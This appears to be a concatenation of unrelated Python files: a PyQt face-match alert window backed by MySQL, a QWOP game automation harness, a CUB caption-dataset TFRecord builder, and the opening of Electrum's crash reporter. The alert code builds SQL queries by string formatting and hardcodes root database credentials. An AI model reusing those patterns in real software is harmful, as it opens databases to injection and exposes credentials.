self.timer.stop()
P1 = multiprocessing.Process(target=self.send_mail)
P1.start()
self.tw = time.time()
def controlTimer(self):
# if timer is stopped
if not self.timer.isActive():
self.timer.start(20)
def stop_(self):
self.btn_sndmail.setText('Send Mail')
self.timer.stop()
def send_mail(self):
print('Mail has been Send')
def display_profile(self,f_name,f_name2):
self.curr_dt = str(datetime.datetime.now())
connnection = pymysql.connect("localhost","root","rootpass","project")
cursor = connnection.cursor()
select_query = "select * from blockacess where fname ='%s'" %(f_name)
cursor.execute(select_query)
row = cursor.fetchone()
self.lineEdit_id.setText(str(row[0]))
self.lineEdit_name.setText(row[1])
self.lineEdit_age.setText(row[3])
self.lineEdit_gender.setText(row[4])
self.lineEdit_nationality.setText(row[5])
self.lineEdit_other.setText(row[6])
self.lineEdit_datetime.setText(self.curr_dt)
#self.lineEdit_date.setText(curdate())
#self.lineEdit_time.setText(curtime())
self.enrolled_img = 'Registered/' + f_name + '.jpg'
self.lastmatch_img = 'Monitor/Registered/'+f_name+'/' + f_name2
pixmap = QtGui.QPixmap('/home/anonymous/Desktop/Project-test/Registered/' + f_name + '.jpg')
pixmap = pixmap.scaled(self.label_img1.width(), self.label_img1.height(), QtCore.Qt.KeepAspectRatio)
self.label_img1.setPixmap(pixmap)
self.label_img1.setAlignment(QtCore.Qt.AlignCenter)
pixmap = QtGui.QPixmap('/home/anonymous/Desktop/Project-test/Monitor/Registered/'+f_name+'/' + f_name2)
pixmap = pixmap.scaled(self.label_img2.width(), self.label_img2.height(), QtCore.Qt.KeepAspectRatio)
self.label_img2.setPixmap(pixmap)
self.label_img2.setAlignment(QtCore.Qt.AlignCenter)
P1 = multiprocessing.Process(target=self.view)
P1.start()
def view(self):
ID = int(self.lineEdit_id.text())
connnection = pymysql.connect("localhost", "root", "rootpass", "project")
cursor = connnection.cursor()
select_query = ("select count(*) from view where id =%d") % (ID)
cursor.execute(select_query)
r = cursor.fetchone()
v = int(r[0]) + 1
insert_query = "insert into view(id,curr_time,curr_date,visit) values(%d,curtime(),curdate(),%d)" % (ID, v)
cursor.execute(insert_query)
connnection.commit()
connnection.close()
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(681, 343)
MainWindow.setStyleSheet("*{\n"
" color:rgb(186, 189, 182);\n"
" background:rgb(46, 52, 54);\n"
" font: 12pt \"URW Gothic L\";\n"
"}\n"
"QLineEdit{\n"
" color:rgb(238, 238, 236);\n"
" border:1px solid rgb(186, 189, 182);\n"
" \n"
"}")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.label_img1 = QtWidgets.QLabel(self.centralwidget)
self.label_img1.setGeometry(QtCore.QRect(20, 80, 151, 161))
self.label_img1.setStyleSheet("QLabel{\n"
" border:1px solid rgb(211, 215, 207);\n"
"}")
self.label_img1.setText("")
self.label_img1.setObjectName("label_img1")
self.label_img2 = QtWidgets.QLabel(self.centralwidget)
self.label_img2.setGeometry(QtCore.QRect(190, 80, 151, 161))
self.label_img2.setStyleSheet("QLabel{\n"
" border:1px solid rgb(211, 215, 207);\n"
"}")
self.label_img2.setText("")
self.label_img2.setObjectName("label_img2")
self.btn_stopsiren = QtWidgets.QPushButton(self.centralwidget)
self.btn_stopsiren.setGeometry(QtCore.QRect(110, 290, 171, 41))
self.btn_stopsiren.setStyleSheet("QPushButton{\n"
" border:1px solid red; \n"
" background:rgb(239, 41, 41);\n"
" border-radius:15px;\n"
" color:white;\n"
"}\n"
"QPushButton:hover{\n"
" border:1px solid white;\n"
"}")
self.btn_stopsiren.setObjectName("btn_stopsiren")
self.btn_sndmail = QtWidgets.QPushButton(self.centralwidget)
self.btn_sndmail.setGeometry(QtCore.QRect(360, 290, 181, 41))
self.btn_sndmail.setStyleSheet("QPushButton{\n"
" border:1px solid rgb(52, 101, 164); \n"
" background:rgb(52, 101, 164);\n"
" border-radius:15px;\n"
" color:white;\n"
"}\n"
"QPushButton:hover{\n"
" border: 1px solid white;\n"
"}")
self.btn_sndmail.setObjectName("btn_sndmail")
self.lineEdit_id = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_id.setGeometry(QtCore.QRect(390, 60, 41, 21))
self.lineEdit_id.setObjectName("lineEdit_id")
self.lineEdit_name = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_name.setGeometry(QtCore.QRect(520, 60, 141, 21))
self.lineEdit_name.setObjectName("lineEdit_name")
self.lineEdit_age = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_age.setGeometry(QtCore.QRect(410, 100, 51, 21))
self.lineEdit_age.setObjectName("lineEdit_age")
self.lineEdit_gender = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_gender.setGeometry(QtCore.QRect(552, 100, 111, 21))
self.lineEdit_gender.setObjectName("lineEdit_gender")
self.lineEdit_nationality = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_nationality.setGeometry(QtCore.QRect(460, 140, 201, 21))
self.lineEdit_nationality.setObjectName("lineEdit_nationality")
self.lineEdit_other = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_other.setGeometry(QtCore.QRect(450, 180, 211, 21))
self.lineEdit_other.setObjectName("lineEdit_other")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(360, 60, 21, 17))
self.label_3.setObjectName("label_3")
self.label_4 = QtWidgets.QLabel(self.centralwidget)
self.label_4.setGeometry(QtCore.QRect(460, 60, 51, 17))
self.label_4.setObjectName("label_4")
self.label_5 = QtWidgets.QLabel(self.centralwidget)
self.label_5.setGeometry(QtCore.QRect(360, 100, 41, 21))
self.label_5.setObjectName("label_5")
self.label_6 = QtWidgets.QLabel(self.centralwidget)
self.label_6.setGeometry(QtCore.QRect(480, 100, 67, 17))
self.label_6.setObjectName("label_6")
self.label_7 = QtWidgets.QLabel(self.centralwidget)
self.label_7.setGeometry(QtCore.QRect(360, 140, 91, 21))
self.label_7.setObjectName("label_7")
self.label_8 = QtWidgets.QLabel(self.centralwidget)
self.label_8.setGeometry(QtCore.QRect(360, 180, 81, 17))
self.label_8.setObjectName("label_8")
self.label_9 = QtWidgets.QLabel(self.centralwidget)
self.label_9.setGeometry(QtCore.QRect(360, 220, 91, 17))
self.label_9.setObjectName("label_9")
self.label_11 = QtWidgets.QLabel(self.centralwidget)
self.label_11.setGeometry(QtCore.QRect(130, 40, 121, 31))
self.label_11.setStyleSheet("QLabel{\n"
" color:rgb(115, 210, 22);\n"
" border:1px solid red;\n"
"}")
self.label_11.setObjectName("label_11")
self.label_12 = QtWidgets.QLabel(self.centralwidget)
self.label_12.setGeometry(QtCore.QRect(280, 0, 121, 41))
self.label_12.setStyleSheet("QLabel{\n"
" color:white; \n"
" font: 63 23pt \"URW Gothic L\";\n"
"}")
self.label_12.setObjectName("label_12")
self.lineEdit_datetime = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_datetime.setGeometry(QtCore.QRect(450, 220, 211, 21))
self.lineEdit_datetime.setObjectName("lineEdit_datetime")
self.label_13 = QtWidgets.QLabel(self.centralwidget)
self.label_13.setGeometry(QtCore.QRect(40, 250, 111, 21))
self.label_13.setStyleSheet("QLabel{\n"
" color:white;\n"
"}")
self.label_13.setObjectName("label_13")
self.label_14 = QtWidgets.QLabel(self.centralwidget)
self.label_14.setGeometry(QtCore.QRect(220, 250, 91, 21))
self.label_14.setStyleSheet("QLabel{\n"
" color:white;\n"
"}")
self.label_14.setObjectName("label_14")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
pygame.mixer.init()
pygame.mixer.music.load('Sound/siren.wav')
pygame.mixer.music.play(0)
self.P2 = multiprocessing.Process(target=self.send_mail)
self.btn_sndmail.clicked.connect(self.P2.start)
self.btn_stopsiren.clicked.connect(self.stop_)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.btn_stopsiren.setText(_translate("MainWindow", "Stop Siren/Mail"))
self.btn_sndmail.setText(_translate("MainWindow", "Send Mail"))
self.label_3.setText(_translate("MainWindow", "ID"))
self.label_4.setText(_translate("MainWindow", "Name "))
self.label_5.setText(_translate("MainWindow", "Age"))
self.label_6.setText(_translate("MainWindow", "Gender"))
self.label_7.setText(_translate("MainWindow", "Nationality"))
self.label_8.setText(_translate("MainWindow", "Other Info"))
self.label_9.setText(_translate("MainWindow", "Date/Time"))
self.label_11.setText(_translate("MainWindow", "Match Found"))
self.label_12.setText(_translate("MainWindow", "ALERT!!!"))
self.label_13.setText(_translate("MainWindow", "Enrolled Photo"))
self.label_14.setText(_translate("MainWindow", "Last Match"))
import img
if __name__=="__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_Alert()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_()) |
qwop.py | """ Functions for creating and positioning a webview with the QWOP game """
import os
import platform
import pyautogui
import threading
import time
from datetime import timedelta
from selenium import webdriver
from totter.api.image_processing import ImageProcessor
from totter.utils.time import WallTimer
# determine size of screen
screen_width, screen_height = pyautogui.size()
# correct for double-monitor setup
if screen_width > 1920:
screen_width = screen_width // 2
# qwop-related constants
_QWOP_URL = "http://foddy.net/Athletics.html?webgl=true" # Note that it should be the HTML5 version
_QWOP_WIDTH = 700
_QWOP_HEIGHT = 500
QWOP_CENTER = (screen_width // 2, screen_height // 2)
QWOP_BOUNDING_BOX = (
QWOP_CENTER[0] - _QWOP_WIDTH // 2, # left
QWOP_CENTER[1] - _QWOP_HEIGHT // 2, # top
_QWOP_WIDTH, # width
_QWOP_HEIGHT # height
)
# create a selenium driver to open web pages
current_dir = os.path.dirname(os.path.abspath(__file__))
driver_dir = os.path.join(current_dir, 'drivers')
# find the appropriate geckodriver for the current platform
if platform.system() == 'Linux':
geckopath = os.path.join(driver_dir, 'nix', 'geckodriver')
elif platform.system() == 'Darwin':
geckopath = os.path.join(driver_dir, 'osx', 'geckodriver')
else:
geckopath = os.path.join(driver_dir, 'win', 'geckodriver.exe')
geckopath = os.path.abspath(geckopath)
_browser = None
def _open_qwop_window():
""" Opens a browser tab with the HTML5 version of QWOP """
global _browser
_browser = webdriver.Firefox(executable_path=geckopath)
# move the browser window to a fixed and predictable location
_browser.set_window_size(width=QWOP_BOUNDING_BOX[2]+100, height=QWOP_BOUNDING_BOX[3]+100)
_browser.set_window_position(x=QWOP_BOUNDING_BOX[0]-50, y=QWOP_BOUNDING_BOX[1]-50)
_browser.get(_QWOP_URL)
def _close_qwop_window():
""" Kills the open webview """
global _browser
_browser.quit()
def _end_game_manually():
""" Performs a series of bad keystrokes that probably ends the game """
pyautogui.keyDown('w')
time.sleep(1)
pyautogui.keyUp('w')
pyautogui.keyDown('q')
pyautogui.keyDown('p')
time.sleep(3)
pyautogui.keyUp('q')
pyautogui.keyUp('p')
def start_qwop():
""" Create a QWOP instance and wait for it to load """
_open_qwop_window()
time.sleep(5)
def stop_qwop():
""" Stop the QWOP instance if one is open """
global _browser
if _browser is not None:
_close_qwop_window()
class QwopSimulator(object):
def __init__(self, time_limit, buffer_size=16):
""" Initialize a QwopSimulator
QwopSimulator provides a method for running a QwopStrategy object in an instance of the QWOP game
Args:
time_limit (float): time limit in seconds for the simulation
buffer_size (int):
number of checks to perform in the same-history ending condition.
If the distance run is the same for `buffer_size` checks in a row, then the simulation is terminated.
Checks are performed 3-4 times per second depending on processor speed.
"""
self.time_limit = time_limit
self.timer = WallTimer()
self.image_processor = ImageProcessor(buffer_size=buffer_size)
def _loop_gameover_check(self, interval=0.25):
""" Checks if the game has ended every `interval` seconds.
Terminates when the game ends or after the simulator's time limit is reached.
Args:
interval (float): time in seconds between game over checks
Returns: None
"""
while self.timer.since() < timedelta(seconds=self.time_limit):
screen = pyautogui.screenshot(region=QWOP_BOUNDING_BOX)
self.image_processor.update(screen)
if self.image_processor.is_game_over():
break
time.sleep(interval)
def is_game_over(self):
return self.image_processor.is_game_over()
def simulate(self, strategy, qwop_started=False):
""" Run the given QwopStrategy
Args:
strategy (QwopStrategy): the strategy to execute
qwop_started (bool): if set, the simulator will assume that a QWOP window has already been opened
Returns:
(float, float): distance run, time taken
"""
if not qwop_started:
start_qwop()
# click the qwop window to give it keyboard focus
pyautogui.moveTo(QWOP_CENTER[0], QWOP_CENTER[1], duration=0.1)
pyautogui.click()
# press spacebar to restart the simulator if necessary
pyautogui.press('space')
# prep for a new run
self.timer.restart()
self.image_processor.reset()
# start a thread to check if the game is over:
game_over_checker = threading.Thread(target=self._loop_gameover_check, args=(0.25,))
game_over_checker.start()
# loop the strategy until the game ends or we hit the time limit
while self.timer.since() < timedelta(seconds=self.time_limit) and not self.image_processor.is_game_over():
strategy.execute()
strategy.cleanup()
# wait for the game over thread to finish its thing
game_over_checker.join()
distance_run = self.image_processor.get_final_distance()
run_time = self.timer.since().seconds
# if the simulator started its own QWOP window, then it should be destroyed
if not qwop_started:
stop_qwop()
return distance_run, run_time
class QwopEvaluator(object):
def __init__(self, time_limit):
""" Initialize a QwopEvaluator
QwopEvaluator objects run QwopStrategy objects and report the distance run and time taken.
Args:
time_limit (float): time limit in seconds for each evaluation
"""
self.evaluations = 0
self.simulator = QwopSimulator(time_limit=time_limit)
# create an instance of QWOP
start_qwop()
def evaluate(self, strategies):
""" Evaluates a QwopStrategy or a set of QwopStrategy objects
Args:
strategies (QwopStrategy or Iterable<QwopStrategy>): set of strategies to evaluate
Returns:
((distance1, time1), (distance2, time2), ...): distance,time pairs achieved by each QwopStrategy
"""
# check if a single strategy has been passed
try:
num_strategies = len(strategies)
except TypeError: # raised if a single QwopStrategy was passed
strategies = [strategies]
num_strategies = len(strategies)
# create a vector to hold fitness values (initially filled with zeros)
fitness_values = [(0, 0) for i in range(0, num_strategies)]
# evaluate the strategies
for index, strategy in enumerate(strategies):
distance_run, time_taken = self.simulator.simulate(strategy, qwop_started=True)
fitness_values[index] = (distance_run, time_taken)
# if the strategy didn't end the game, end it manually
if not self.simulator.is_game_over():
_end_game_manually()
return tuple(fitness_values)
class QwopStrategy:
def __init__(self, execution_function):
""" Class representing QWOP strategies
A QWOP Strategy is a sequence of keystrokes that plays QWOP.
Each Strategy must implement an `execute` method, which executes the keystrokes for the strategy with the correct timing.
When evaluating the strategy, `execute` will automatically be looped until the game ends.
Args:
execution_function (function): function that implements the strategy
"""
self.execute = execution_function
def cleanup(self):
""" Cleans up after strategy execution
This method will be called after the game has ended or the evaluation time limit has been reached
Returns: None
"""
# ensure all keys are up
for key in ('q', 'w', 'o', 'p', 'space'):
pyautogui.keyUp(key)
|
build_cub_data.py | # -*- coding: utf-8 -*-
# @File : google_im2txt/build_cub_data.py
# @Info : @ TSMC-SIGGRAPH, 2018/7/7
# @Desc :
# -.-.. - ... -- -.-. .-.. .- -... .---. -.-- ..- .-.. --- -. --. ..-. .- -.
import os
import random
import sys
import threading
from collections import namedtuple, Counter
from datetime import datetime
import numpy as np
import tensorflow as tf
from nltk.tokenize import word_tokenize
tf.flags.DEFINE_string("train_image_dir", "/dataset/cub_merge_data/train",
"Training image directory.")
tf.flags.DEFINE_string("val_image_dir", "/dataset/cub_merge_data/val",
"Validating image directory.")
tf.flags.DEFINE_string("test_image_dir", "/dataset/cub_merge_data/test",
"Testing image directory.")
tf.flags.DEFINE_string("train_captions_file", "/dataset/cub_merge_data/cub_train_captions",
"Training captions text file.")
tf.flags.DEFINE_string("val_captions_file", "/dataset/cub_merge_data/cub_val_captions",
"Validating captions text file.")
tf.flags.DEFINE_string("test_captions_file", "/dataset/cub_merge_data/cub_test_captions",
"Testing captions text file.")
tf.flags.DEFINE_string("output_dir", "/dataset/cub200_tfrecord", "Output data directory.")
tf.flags.DEFINE_integer("train_shards", 128,
"Number of shards in training TFRecord files.")
tf.flags.DEFINE_integer("val_shards", 4,
"Number of shards in validation TFRecord files.")
tf.flags.DEFINE_integer("test_shards", 8,
"Number of shards in testing TFRecord files.")
tf.flags.DEFINE_string("start_word", "<S>",
"Special word added to the beginning of each sentence.")
tf.flags.DEFINE_string("end_word", "</S>",
"Special word added to the end of each sentence.")
tf.flags.DEFINE_string("unknown_word", "<UNK>",
"Special word meaning 'unknown'.")
tf.flags.DEFINE_integer("min_word_count", 4,
"The minimum number of occurrences of each word in the "
"training set for inclusion in the vocabulary.")
tf.flags.DEFINE_string("word_counts_output_file", "/dataset/cub200_tfrecord/word_counts.txt",
"Output vocabulary file of word counts.")
tf.flags.DEFINE_integer("num_threads", 8,
"Number of threads to preprocess the images.")
FLAGS = tf.flags.FLAGS
ImageMetadata = namedtuple("ImageMetadata",
["filename", "captions"])
def _process_caption(caption):
"""Processes a caption string into a list of tonenized words.
Args:
caption: A string caption.
Returns:
A list of strings; the tokenized caption.
"""
tokenized_caption = [FLAGS.start_word]
tokenized_caption.extend(word_tokenize(caption.lower()))
tokenized_caption.append(FLAGS.end_word)
return tokenized_caption
class Vocabulary(object):
def __init__(self, vocab, unk_id):
"""initializes the vocabulary.
:arg vocab: a dictionary of word to word_id.
unk_id: id of the special 'unknown' word."""
self._vocab = vocab
self._unk_id = unk_id
def word_to_id(self, word):
""":returns the integer id of a word string"""
if word in self._vocab:
return self._vocab[word]
else:
return self._unk_id
class ImageDecoder(object):
"""helper class for decoding images in tensorflow"""
def __init__(self):
"""create a single tensorflow sessiion for all image decoding calls"""
self._sess = tf.Session()
# tensorflow ops for JPEG decoding
self._encoded_jpeg = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3)
def decode_jpeg(self, encoded_jpeg):
image = self._sess.run(self._decode_jpeg, feed_dict={self._encoded_jpeg: encoded_jpeg})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _int64_feature(value):
"""Wrapper for inserting an int64 Feature into a SequenceExample proto."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting a bytes Feature into a SequenceExample proto."""
# return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)]))
# fixed typeError 'has type str, but expected one of: bytes'. for python3 compatibility
# value = np.array(value).tobytes()
# return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature_list(values):
"""Wrapper for inserting an int64 FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_int64_feature(v) for v in values])
def _bytes_feature_list(values):
"""Wrapper for inserting a bytes FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values])
def _to_sequence_example(image, decoder, vocab):
"""builds a sequenceExample proto for an image-caption pair.
:arg image: an ImageMetadata object.
decoder: an ImageDecoder object.
vocab: a Vocabulary object.
:returns a SequenceExample proto.in which containing image dataset and integer captions"""
with tf.gfile.FastGFile(image.filename, "rb") as f:
encoded_image = f.read()
# # in order to open the image, and I removed the try, except image decoder check that follows reading the image.
# # see: [https://github.com/tensorflow/models/issues/827], just for supporting python3
# try:
# encoded_image = decoder.decode_jpeg(encoded_image)
# except (tf.errors.InvalidArgumentError, AssertionError):
# print("skipping file with invalid JPEG dataset: %s" % image.filename)
# return
context = tf.train.Features(feature={
"image/data": _bytes_feature(encoded_image),
"image/filename": _bytes_feature(os.path.basename(image.filename).encode())
})
# although there are 10 captions for each image in oxford-102flower dataset, we have assign image for each caption
assert len(image.captions) == 1
caption = image.captions[0]
caption_ids = [vocab.word_to_id(word) for word in caption]
feature_lists = tf.train.FeatureLists(feature_list={
"image/caption_ids": _int64_feature_list(caption_ids)
})
sequence_example = tf.train.SequenceExample(context=context, feature_lists=feature_lists)
return sequence_example
def _create_vocab(captions):
"""creates the vocabulary of word to word_id.
The vocabulary is saved to disk in a text file of word ccunts. the id of each word
in the file is its corresponding 0-based line number.
> counter=Counter()
> for c in [['this','is','a','young','girl'],['tonight','we','are','young']]:
... counter.update(c)
> counter
Counter({'young': 2, 'this': 1, 'is': 1, 'a': 1, 'girl': 1, 'tonight': 1, 'we': 1, 'are': 1})
:arg captions: a list of lists of strings.
:returns a vocabulary object.
"""
print("Creating vocabulary...")
counter = Counter()
for c in captions:
counter.update(c)
print("Total words:", len(counter))
# filter uncommon words and sort by descending count.
word_counts = [x for x in counter.items() if x[1] >= FLAGS.min_word_count]
word_counts.sort(key=lambda x: x[1], reverse=True)
print("words in vocabulary: ", len(word_counts))
# write out the word counts file.
with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f:
f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts]))
print("wrote vocabulary file:", FLAGS.word_counts_output_file)
# create the vocabulary dictionary.
# note: Be careful with 0's in vocabulary,
# padding tensors with 0's may not be able to tell the difference between 0-padding
reverse_vocab = [x[0] for x in word_counts]
unk_id = len(reverse_vocab)
# enumerate a range of numbers starting at 0
vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab, start=0)])
vocab = Vocabulary(vocab_dict, unk_id)
return vocab
def _select_shorter_captions(captions, top_n):
"""
:param captions: a list of lists of string, such as [['a','b'],['c','d','e']]
:param top_n: an integer
:return: a list with top_n shortest length of the lists of string,
"""
assert top_n <= 10
lengths = [[x, len(y)] for x, y in enumerate(captions)]
# note: python3 works well, python2 unknown
lengths.sort(key=lambda elem: elem[1])
hit_elem = lengths[:top_n]
top_n_sentences = [captions[id_len[0]] for id_len in hit_elem]
return top_n_sentences
def _load_and_process_metadata(captions_file, image_dir):
"""loads image metadata for disk and processes the captions.
return one elem of a list of ImageMetadata like follows:
> [ImageMetadata(filename='/dataset/102flowers/jpg_resized/image_01074.jpg',
captions=[['<S>', 'this', 'flower', 'has', 'nice', 'yellow', 'petals', 'with', 'white', 'ovule', '.', '</S>'],
...
['<S>', 'this', 'is', 'a', 'flower', 'with', 'yellow', 'petals', 'and', 'a', 'white', 'stigma', '.', '</S>']])]
:arg captions_file: text file containing image filename and caption annotations pairs.
image_xxxxx.jpg#caption in each line
image_dir: directory containing the image files.
:returns a list of ImageMetadata."""
with tf.gfile.FastGFile(captions_file, "r") as f:
captions_data = f.readlines()
# extract the filenames. hint: image_xxxxx.jpg#caption in each line
# extract the captions, each image is associated with multiple captions.
img_to_captions = dict()
for line in captions_data:
_img_filename, _annotation = line.strip().split("#")
img_to_captions.setdefault(_img_filename, [])
img_to_captions[_img_filename].append(_annotation)
img_filenames = set(img_to_captions.keys())
assert len(img_to_captions) == len(img_filenames)
# Process the captions and combine the dataset into a list of ImageMetadata.
print("processing captions.")
image_metadata = []
num_captions = 0
for base_filename in img_filenames:
filename = os.path.join(image_dir, base_filename)
captions = [_process_caption(c) for c in img_to_captions[base_filename]]
# # hint: Select the five shortest sentences
# captions = _select_shorter_captions(captions, 5)
image_metadata.append(ImageMetadata(filename, captions))
num_captions += len(captions)
print("finished processing %d captions for %d images in %s" % (num_captions, len(img_filenames), captions_file))
return image_metadata
def _process_image_files(thread_index, ranges, name, images, decoder, vocab, num_shards):
"""processes and saves a subset of images as TFRecord files in one thread.
:arg thread_index:Integer thread identifire within [0,len(ranges)].
ranges: a list of piars of integers secifying the ranges of the dataset to process in parallel.
name: unique identifire specifying the dataset.
images: list of ImageMetadata.
decoder: an ImageDecoder object.
vocab: a Vocabulary object.
num_shards: Integer number of shards for the output files."""
# each thread produces N shards where N = num_shards/num_threads, for instance, if
# num_shards =128, and num_threads =2, then the first thread would produce shards [0, 64)
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards // num_threads)
shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1], num_shards_per_batch + 1).astype(int)
num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# generate a sharded version of the file name, e.g. `train-00002-of-00010`
shard = thread_index * num_shards_per_batch + s
output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_dir, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in images_in_shard:
image = images[i]
sequence_example = _to_sequence_example(image, decoder, vocab)
if sequence_example is not None:
writer.write(sequence_example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print("%s [thread %d]: Processed %d of %d items in thread batch." %
(datetime.now(), thread_index, counter, num_images_in_thread))
sys.stdout.flush()
writer.close()
print("%s [thread %d]: Wrote %d image-caption pairs to %s" %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." %
(datetime.now(), thread_index, counter, num_shards_per_batch))
sys.stdout.flush()
# todo
def _process_dataset(name, images, vocab, num_shards):
"""processes a complete dataset set and saves it as a TFRecord.
:arg name: unique identifier specifying the dataset
images: list of ImageMetadata.
vocab: a Vocabulary object.
num_shards: Integer number of shards for the output files."""
# hint: break up each image into a separate entity for each cation.
images = [ImageMetadata(image.filename, [caption]) for image in images for caption in image.captions]
# now length of images.cations is one
# shuffle the ordering of images. make the randomizatiion repeatable.
random.seed(12345)
random.shuffle(images)
# break the images into num_threads batches. batch i is defined as images[ranges[i][0]:ranges[i][1]].
num_threads = min(num_shards, FLAGS.num_threads)
spacing = np.linspace(0, len(images), num_threads + 1).astype(np.int)
ranges = list()
threads = list()
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a utility for decoding JPEG images to run sanity checks.
decoder = ImageDecoder()
# Launch a thread for each batch.
print("Launching %d threads for spacings: %s" % (num_threads, ranges))
for thread_index in range(len(ranges)):
args = (thread_index, ranges, name, images, decoder, vocab, num_shards)
t = threading.Thread(target=_process_image_files, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print("%s: Finished processing all %d image-caption pairs in dataset set '%s'." %
(datetime.now(), len(images), name))
def main(_):
def _is_valid_num_shards(num_shards):
"""Returns True if num_shards is compatible with FLAGS.num_threads."""
return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads
assert _is_valid_num_shards(FLAGS.train_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.train_shards")
assert _is_valid_num_shards(FLAGS.val_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")
assert _is_valid_num_shards(FLAGS.test_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.test_shards")
if not tf.gfile.IsDirectory(FLAGS.output_dir):
tf.gfile.MakeDirs(FLAGS.output_dir)
# Load image metadata from caption files.
cub_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file, FLAGS.train_image_dir)
cub_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file, FLAGS.val_image_dir)
cub_test_dataset = _load_and_process_metadata(FLAGS.test_captions_file, FLAGS.test_image_dir)
# Redistribute the cub200_2011 dataset as follows:
# train_dataset = 85% of cub_dataset.
# val_dataset = 5% of cub_dataset (for validation during training).
# test_dataset = 10% of cub_dataset (for final evaluation).
# Create vocabulary from the training captions.
train_captions = [c for image in cub_train_dataset for c in image.captions]
vocab = _create_vocab(train_captions)
_process_dataset("train", cub_train_dataset, vocab, FLAGS.train_shards)
_process_dataset("val", cub_val_dataset, vocab, FLAGS.val_shards)
_process_dataset("test", cub_test_dataset, vocab, FLAGS.test_shards)
#################
# test call #
#################
if __name__ == "__main__":
tf.app.run()
|
base_crash_reporter.py | # Electrum - lightweight ILCOIN client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import subprocess
import sys
import os
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger
class BaseCrashReporter(Logger):
report_server = "https://crashhub.electrum.org"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
